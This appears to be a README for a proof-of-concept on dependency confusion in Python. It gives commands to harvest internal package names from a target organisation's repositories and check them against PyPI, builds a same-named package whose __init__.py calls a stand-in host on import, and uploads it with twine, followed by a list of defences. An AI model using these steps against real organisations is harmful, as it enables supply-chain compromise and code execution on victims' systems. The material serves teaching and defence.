Dependency confusion is a supply chain vulnerability that arises when package managers inadvertently install malicious packages from public repositories instead of intended private ones. This issue is particularly prevalent in Python's package management system, where tools like pip
may prioritize public packages over private ones if not properly configured. Exploiting this behavior can lead to severe consequences, including remote code execution (RCE) on target systems.
The typical workflow of a dependency confusion attack involves the following steps:
-
Identifying Target Dependencies: Attackers search for
requirements.txt
files in public repositories to identify internal package names used by organizations. -
Verifying Package Availability: For each identified package, attackers check if it exists on the public Python Package Index (PyPI). This can be automated using tools like
httpx
to detect 404 responses, indicating the package is absent from PyPI. -
Publishing Malicious Packages: Attackers create and publish malicious packages on PyPI using the same names as the internal packages. These malicious packages can be designed to execute arbitrary code upon installation.
-
Triggering Installation: When the target organization installs dependencies without strict index configurations,
pip
may fetch the malicious package from PyPI, leading to code execution within the organization's environment.
The repository provides a PoC demonstrating this attack vector:
- Cloning Target Repositories: Utilize tools like ghorg to clone all repositories from a target organization.
ghorg clone <target_organization> -t <personal_access_token>
- Extracting Dependencies: Search for
requirements.txt
files and extract package names.
find . -type f -name requirements.txt | \
xargs -n1 -I{} cat {} | \
sed 's/[><=~!].*//' | \
tr -d '[:space:]' | \
sort -u | \
xargs -I{} sh -c 'curl -s -o /dev/null -w "%{http_code} https://pypi.org/project/{}/\n" https://pypi.org/project/{}/' | \
grep "^404"
- Creating Malicious Packages: For each vulnerable package:
$ mkdir <package-name>
$ cd <package-name>
$ mkdir <package-name>
$ cd <package-name>
$ touch __init__.py
- Insert malicious code into
__init__.py
:
import requests
# Example: Send a request to a monitoring URL
requests.get("https://example.com/notify")
- Save this file and back
cd..
from the directory - Create
setup.py
with appropriate metadata:
Note: The version of package and the version of the vulnerable package must be same
from setuptools import setup, find_packages
setup(
name="<package-name>",
version="0.0.1",
author="Attacker Name",
author_email="[email protected]",
description="Malicious package for dependency confusion attack",
packages=find_packages(),
install_requires=['requests'],
)
- Build and upload the package to PyPI:
$ python3 setup.py sdist bdist_wheel
$ pip3 install twine
$ twine upload dist/*
To protect against dependency confusion attacks:
-
Configure Package Indexes: Use
--index-url
and--extra-index-url
options inpip
to prioritize private repositories over public ones. -
Implement Package Scopes: Employ tools like
pip
's upcoming features (as per PEP 708) to define trusted sources for specific packages. -
Monitor and Audit Dependencies: Regularly scan dependencies for anomalies and ensure that all internal packages are also present in private repositories to prevent unauthorized public versions.
-
Use Dependency Management Tools: Utilize tools like Thoth to manage and resolve dependencies securely.
Dependency confusion poses a significant risk to software supply chains. By understanding the attack vectors and implementing robust dependency management practices, organizations can mitigate the threat and secure their development environments.
If you have any queries, you can always contact me on Linkedin